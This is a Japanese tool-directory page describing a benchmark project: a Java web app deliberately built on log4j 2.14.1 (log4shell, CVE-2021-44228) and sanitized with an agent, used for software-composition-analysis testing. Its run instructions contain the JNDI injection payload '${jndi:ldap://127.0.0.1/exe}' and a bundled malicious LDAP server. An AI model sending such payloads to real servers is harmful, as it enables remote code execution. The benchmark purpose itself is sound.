Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
l4j-fp1 — サニタイズ済みのlog4shell(CVE-2021-44228)脆弱性を含むjee Webプロジェクト | Kitploit
ツール/GitHubGitHub/scabench/l4j-fp1
脆弱性分析コード分析エクスプロイトウェブセキュリティサプライチェーンセキュリティ学習と教育
GitHubscabench/l4j-fp1

l4j-fp1

サニタイズ済みのlog4shell(CVE-2021-44228)脆弱性を含むjee Webプロジェクト

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

log4shell 誤検知

これは、サニタイズされた log4shell 脆弱性を持つシンプルな Web プロジェクトです。サニタイズされていないバージョンについては、https://github.com/scabench/l4j-tp1/ を参照してください。 このプロジェクトは、プレーンテキスト文字列 hello world を返すシンプルな scabench.HelloWorldService GET サービスを定義しています。 このサービスはパラメータを想定しておらず、パラメータが渡されるとエラーがログに記録されます。

脆弱な依存関係は org.apache.logging.log4j:log4j-core:2.14.1 で、脆弱性は CVE-2021-44228 です。

サニタイズ

このプロジェクトは、log4shell が出現しパッチが利用できなかった際に、Amazon 製エージェント を使用します。 このエージェントは、脆弱なクラス org.apache.logging.log4j.core.lookup.JndiLookup を無効化します。

エージェントの使用は、scabench.HelloWorldService がロードされるとき(クラスの static ブロック内)にエージェントを動的にインストール(別名アタッチ)することで強制されます。 これが失敗すると、アプリケーションはクラッシュします。このためには、JVM がエージェントの自己アタッチを有効にしている必要があります。

アプリケーションの実行

  1. JVM エージェントの自己アタッチを有効にします: export MAVEN_OPTS="-Djdk.attach.allowAttachSelf=true"
  2. 組み込み Web サーバーを起動します: mvn jetty:run
  3. 同梱の LDAP サーバーを起動します: java -jar dodgy-ldap-server.jar(脆弱なコードはこのサーバーから Java コードをダウンロードします)
  4. ブラウザで http://localhost:8080/ を開きます。このサイトには、悪意のあるペイロード ${jndi:ldap://127.0.0.1/exe} が入力済みのフォームがあります
  5. このフォームを送信します
  6. これにより、(サニタイズされていないバージョン とは異なり) サーバー上にファイル foo は作成されません

アプリケーションを実行すると、コンソールに次の行が表示されることに注意してください:

Transforming org/apache/logging/log4j/core/lookup/JndiLookup .

テストによるサニタイズの実証

これには Unix または macOS が必要です。このプロジェクトを Windows に移植するのは簡単です。 この脆弱性を実証するための単体テストが提供されており、セットアップは https://github.com/scabench/l4j-tp1/ と同じです。サニタイズのため、 このテストは現在 失敗 します。

ソフトウェア構成分析の実行

さまざまな分析を実行するための sh スクリプトがいくつかあります。結果レポートは scan-results にあります。

SBOM の生成

pom.xml には、CycloneDX 形式で SBOM を生成するプラグインがあります。 これを行うには、mvn cyclonedx:makePackageBom を実行します。SBOM は target/ 内に json 形式と xml 形式であります。

ツールをダウンロード